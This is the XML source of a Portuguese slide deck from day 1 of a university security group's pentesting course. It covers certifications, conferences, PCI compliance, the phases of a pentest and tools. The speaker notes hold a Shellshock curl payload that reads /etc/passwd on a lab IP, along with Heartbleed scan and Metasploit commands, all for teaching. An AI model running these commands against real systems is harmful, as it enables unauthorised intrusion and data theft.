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7.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image4.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image6.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image1.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/media/image11.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image2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&lt;header&gt;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&lt;date/time&gt;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&lt;footer&gt;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DC1DB7-DD41-453A-A13F-2A26087508C3}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:latin typeface="Nimbus Roman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É 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Empresas ocasionalmente pedem empregados certificados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Falar sobre legislação (e ambientes de treino)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Olhar quem é o instrutor de cursos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Infiltrate é a mais tensa :v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PARTICIPAR DE CTF \o/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Certificação bandeiras de cartão p/ diminuir problemas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Pessoas contratam pentest p/ ganhar força em compras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Certificação bandeiras de cartão p/ diminuir problemas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Falar sobre pentest físico (encostar mochila, lockpicking, invadir prédios, etc.)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Escopo e diferença atacante real e pentest.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Falar sobre pivoting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Lateralidade em privilégios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Man in the middle no wireless e coisas do tipo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Relatório ATM e da boneca inflável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Muito aplicações, ferramentas e achar que sabe (ferramentas não pega muita vez)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Ex: Aplicação com pontos negativos (lógica, design, etc)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As vezes entra na máquina e já entraram</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Aluno da usp, analista de segurança na apura, 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0day normalmente não é usado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 compilador transforma código possível de ler ( C/C++) em código interpretado pela máquina, normalmente sequências de bytes.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Essas sequências de bytes formam o arquivo binário, que nada mais nada menos é do que um arquivo “não de texto”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Para executar, cria fragmentos de memória virtual (explicar depois), carrega parâmetros e prepara a execução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# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://10.10.10.50:8080/cgi-bin/stats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Bug dentro das aspas -&gt; Programas usam bash para comunicar com outros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# nmap -sV -p 8443 --script=ssl-heartbleed 10.10.10.50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msfconsole -&gt; use scanner/ssl/openssl_heartbleed -&gt; run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Aluno da usp, analista de segurança na apura, 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 compilador transforma código possível de ler ( C/C++) em código interpretado pela máquina, normalmente sequências de bytes.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Essas sequências de bytes formam o arquivo binário, que nada mais nada menos é do que um arquivo “não de texto”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Para executar, cria fragmentos de memória virtual (explicar depois), carrega parâmetros e prepara a execução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Nunca fazer a mesma coisa todo dia</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Consultor normalmente é bem diferente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É Mexe com muitos dados sensíveis, mas normalmente bem remunerado</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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5440" y="3535920"/>
            <a:ext cx="6165360" cy="43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5440" y="3535920"/>
            <a:ext cx="6165360" cy="43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5440" y="3535920"/>
            <a:ext cx="6165360" cy="43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3320"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff">
              <a:alpha val="3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1;p22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7119720" y="1454760"/>
            <a:ext cx="1431000" cy="2261520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Google Shape;12;p22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649560" y="160200"/>
            <a:ext cx="2371320" cy="10670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2dca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0" y="0"/>
            <a:ext cx="8920080" cy="51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f2c6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5440" y="3535920"/>
            <a:ext cx="6165360" cy="9439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BC15A40-B673-4362-ABF0-8357D21F149C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06120" y="1399680"/>
            <a:ext cx="7566120" cy="2343960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667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906120" y="1399680"/>
            <a:ext cx="7331760" cy="2343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003C832-DB02-4FD9-B065-C868B837C853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pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Google Shape;23;p24" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638560" y="182160"/>
            <a:ext cx="464400" cy="612720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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168120" y="182160"/>
            <a:ext cx="8205120" cy="612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68120" y="1309320"/>
            <a:ext cx="8470080" cy="3647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88840" y="877680"/>
            <a:ext cx="821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2dca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 flipH="1" rot="10800000">
            <a:off x="4966200" y="954360"/>
            <a:ext cx="41371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f2c6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h2hc.com.br/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://roadsec.com.br/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sp16.securitybsides.com.br" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ysts.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout29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pt.pcisecuritystandards.org/minisite/env2/" TargetMode="External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1dOCHwf8zVQ" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc6520" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId5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linkedin.com/company/ganeshicmc" TargetMode="External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5440" y="3535920"/>
            <a:ext cx="665964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"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Curso de Férias - Dia 1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31760" y="4480200"/>
            <a:ext cx="74649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Estevam Arantes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CF2F103-3F2F-4C44-968F-2977001BE975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Certificações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110;g5c94cf4a8f_0_41" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2666880" y="929160"/>
            <a:ext cx="380952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99BBD27-3A3D-4084-8A92-96FDBECAF97F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Certificações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Não garantem o seu emprego!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Ajuda? Sim!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CEH - Fuja! Run to the hills!!!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Offensive Security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OSCP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OSWP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OSCE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OSEE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OSWE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5DEBB4A-38C0-4F3B-BC59-9FDDC6699C0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Certificações e Cursos (Pagos)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SANS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GIAC *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Cursos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Offensive Security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SANS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Treinamentos em conferências (vide H2HC)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71274A8-37E5-4DE7-960E-AFA3A106AE25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Certificações e Eventos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12360" y="93456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Eventos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Brasil</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1371600" indent="-329760">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="■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H2HC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Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1371600" indent="-329760">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="■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Roadsec</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1371600" indent="-329760">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="■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Bsides</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1371600" indent="-329760">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="■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4"/>
              </a:rPr>
              <a:t>YSTS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1371600" indent="-329760">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="■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Etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Exterior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Defcon (USA)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CCC (GER)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Blackhat (USA, EU)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EkoParty (ARG)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="914400" indent="-32976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Infiltrate (USA)</a:t>
            </a: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CB9FB43-EC39-470B-9B46-973ED4946EEA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Conformidade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PCI - PCI Security Standards Council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https://pt.pcisecuritystandards.org/minisite/env2/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Importância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PCI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739D49F-F1C9-4437-AAA2-3A8D2561760F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O que é Penetration Test?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Aka Pentest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Tradução literal: “Teste de Penetração”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Processo de identificar e explorar vulnerabilidades em sistemas, redes, hardware, etc.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Diversos métodos: lógicos, físicos, engenharia social, místicos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Única forma de mensurar o risco real de uma vulnerabilidade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075944F-3BCD-4379-8B04-25FD21EFF7A2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Tipos de Pentest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Blind/Black box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Gray box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Non blind/White box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Externo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Interno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Wireless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Físico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Engenharia social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Client-side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Aplicação, etc.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BB1C461-5B03-4275-A989-221B9420AA96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Pentest x Análise de Vulnerabilidade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Confusão!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Pentest não é análise de vulnerabilidades.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Análise de vulnerabilidades não é pentest.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42FF90E-2B81-4527-814C-480F332A72FA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Pentest x Análise de Vulnerabilidade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Análise de Vulnerabilidades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Não ocorre a exploração de vulnerabilidade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Alta ocorrência de falsos positivos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Pentest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Exploração das vulnerabilidades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Não existe falso positivo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Risco Real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928C925-23B8-42A2-B44B-A093D97C3470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Devo realizar um pentest?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Sim!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Quem deve realizar um pentest?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Todo mundo! :D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Porquê?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Simulação real de ataque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Avaliação das suas soluções de defesa (firewall, ids, ips, av)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AE9A288-DB70-4C6F-AA43-E8C0BC20E88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906120" y="1399680"/>
            <a:ext cx="7331760" cy="234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whoami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A075969-8B7C-4734-8CA6-F186A4C098C0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Benefícios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Rápida avaliação da situação real da segurança da empresa.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Eficaz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Ajuda na tomada de decisões (investimentos, alocação de recursos)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Recomendações direcionadas a sanar um problema.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05BD809-FBA9-4F0E-A192-3AEB9C5A177C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Pentester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Pessoa que faz o teste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Pentester != Pesquisador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Brasil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Consultor de Segurança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Analista de Segurança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Analista de Suporte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Analista de RH, Analista de Software (oh wait)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Empresas especializadas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Consultores especializados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B0B4D9D-1E7B-44B7-B5E7-0A115B43CB8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Pentester - Conhecimento necessário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Depende!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Network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Redes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Protocolos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 lot of stuff!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Application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Programação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Protocolos</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="9144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 lot of stuff!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B8345C8-7D9E-456E-948D-134290022D4A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Pentester - Conhecimento necessário II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72480" y="1389600"/>
            <a:ext cx="7750080" cy="33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Diferenciais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Foco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Idiomas estrangeiros (Inglês principalmente!)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D693F8B-48AF-4E4B-93BD-2A1E60A92434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Fases de um pentest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Definição de alvo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Enumerar e identificar ativos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Identificar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Explorar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Atividades pós exploratórias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Coleta de evidências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Escrita do relatório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2C52FFD-0949-4CA1-BD1F-C17A6A74C17E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Fases de um pentest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Definição de alvo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00ff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ff00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Enumerar e identificar ativos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00ff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ff00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Identificar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Explorar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Atividades pós exploratórias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Coleta de evidências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Escrita do relatório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C0B920E-6A52-41FB-91FD-88DBADFD46FE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Fases de um pentest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Definição de alvo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00ff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ff00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Enumerar e identificar ativos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00ff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ff00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Identificar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Explorar as vulnerabilidades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Atividades pós exploratórias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Coleta de evidências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  <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Escrita do relatório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7C6415F-C4B2-40F1-A09C-08CE5E875EFD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68120" y="22032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Demos!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229;g5c94cf4a8f_0_157" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514800" y="986040"/>
            <a:ext cx="3754440" cy="400464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230;g5c94cf4a8f_0_157" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907160" y="986040"/>
            <a:ext cx="3564720" cy="426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9BB5724-A934-4A36-87FF-955516D9BCBA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68120" y="22032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Shellshock - () { :;}; echo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Google Shape;237;g5c94cf4a8f_0_164" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177920" y="1054440"/>
            <a:ext cx="6787440" cy="38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59A1F9E-FA7C-41F3-BB7B-5B618CEB209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pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Google Shape;243;g5c94cf4a8f_0_172" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144000" y="207000"/>
            <a:ext cx="8407440" cy="472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E5293C8-EB56-4EA0-980D-79B2FD76462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Objetivos do curso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168120" y="1309320"/>
            <a:ext cx="6690240" cy="3647520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="5400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Aprendizado teórico com prática;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Aprender a aprender;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Visão geral sobre vários assuntos (outros além do Ping!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Passar dicas e experiências.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6A32984-E5DE-41EF-A720-4796B6141744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Scanners!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61680" y="1084680"/>
            <a:ext cx="386352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Scan de portas, serviços e vulnerabilidades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Nmap (TCP ou UDP)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Reconnoitre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Vulnerabilidades em frameworks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Wpscan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Subdomínios e diretórios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219" name="Google Shape;251;g5c94cf4a8f_0_183" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5011560" y="1027080"/>
            <a:ext cx="3255120" cy="37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B92F7CA-033C-4B68-B512-529EB633C644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Proxies!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42800" y="1098000"/>
            <a:ext cx="5009400" cy="36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Interceptando/Redirecionando e Controlando Informações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Burpsuite + FoxyProxy - Aprendendo a configurar o firefox!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Zed Attack Proxy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223" name="Google Shape;259;g5c94cf4a8f_0_190" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5205240" y="1153440"/>
            <a:ext cx="3703680" cy="33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1FBB0EC-0977-4F25-AE6A-9CD207F882DF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VPN - Virtual Private Network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42800" y="1098000"/>
            <a:ext cx="8086320" cy="36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Interceptando e Redirecionando Informações</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="9144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Openvpn e nossas máquinas vulneráveis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227" name="Google Shape;267;g5c94cf4a8f_0_212" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560600" y="2079360"/>
            <a:ext cx="5850720" cy="273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8C98A3F-1A47-41C7-836B-ECB670E9C893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Links úteis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42800" y="1098000"/>
            <a:ext cx="5009400" cy="36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Heartbleed - Computerphile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RFC HeartBeat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Shellshock CVE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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4"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a: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5440" y="2743560"/>
            <a:ext cx="665964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"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>GANESH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05840" y="3459600"/>
            <a:ext cx="74649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Grupo de Segurança da Informação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latin typeface="Nimbus Sans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105840" y="3787920"/>
            <a:ext cx="74649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ICMC / USP - São Carlos, SP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latin typeface="Nimbus Sans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105840" y="4120920"/>
            <a:ext cx="74649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http://ganesh.icmc.usp.br/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latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="TextShape 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105840" y="4473000"/>
            <a:ext cx="7464960" cy="58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ganesh@icmc.usp.br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F168D0A-0EEF-4022-B182-5D566F3E3EEC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Programação (sujeita a alterações)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168120" y="1309320"/>
            <a:ext cx="8466840" cy="3647520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="5400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1 (manhã) - Eventos e certificações na área de segurança, pentesting e suas fases, vulnerabilidades famosas + metasploit, reconhecimento e scanners, servidores, proxies, VPNs e instruções sobre a parte prática;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1 (tarde) - Desafios de revisão e nivelamento, introdução à VPN do Ganesh, desafios de recon e vulnerabilidades famosas;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2 (manhã) - Vulnerabilidades WEB seguindo OWASP Top 10 - SQL Injection, XSS, XXE, Broken Auth, etc. e ferramentas relacionadas;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2 (tarde) - Juiceshop, Webgoat e outros - Prática de WEB;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91216A9-DB36-47EE-B392-7CA598781D5D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Programação (sujeita a alterações)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68120" y="1309320"/>
            <a:ext cx="8466840" cy="3647520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="54000">
            <a:noAutofit/>
          </a:bodyPr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3 (manhã) - Ataques diversos: Shell Reversa, File Upload Bypass,  Bruteforcing e hashing, proxychain, ataques em redes locais e metasploit em mais detalhes.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3 (tarde) - Exercícios e desafios dos tópicos da manhã (entre outros :D)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4 (manhã) - Livre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4 (tarde) - Escalação de privilégios, OSINT, firewalls, phishing, computação forense e esteganografia.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5 (manhã) - Engenharia Reversa em ELF e em APKs.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Dia 5 (tarde) - Prática de engenharia reversa (possivelmente com malwares reais :D)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C0214A8-189F-4DD3-84AF-5E8B9DFA3D48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06120" y="1399680"/>
            <a:ext cx="7331760" cy="234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Pentest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4B2BA0F-DE67-408B-9355-35C5810B7401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68120" y="22032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Motivação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88;p7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="501120" y="986040"/>
            <a:ext cx="8141400" cy="40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B756483-B7E7-416E-82EB-B43E98BB4479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Motivação II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61680" y="1084680"/>
            <a:ext cx="781056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Trabalho desafiador</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Divertido</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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2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BE8B4C1-EB37-427D-814D-184F58978B65}" type="slidenum"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68120" y="182160"/>
            <a:ext cx="8205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2dca3"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Mercado de Trabalho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61680" y="1084680"/>
            <a:ext cx="776088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Global</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Oportunidades Home Office</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Linkedin é o seu amigo (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="22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Ganesh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b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans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Não faça besteira!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="9144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○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Background check</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:latin typeface="Nimbus Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-36792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Mercado baseado em reputação</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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2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2019-07-01T19:50:25Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>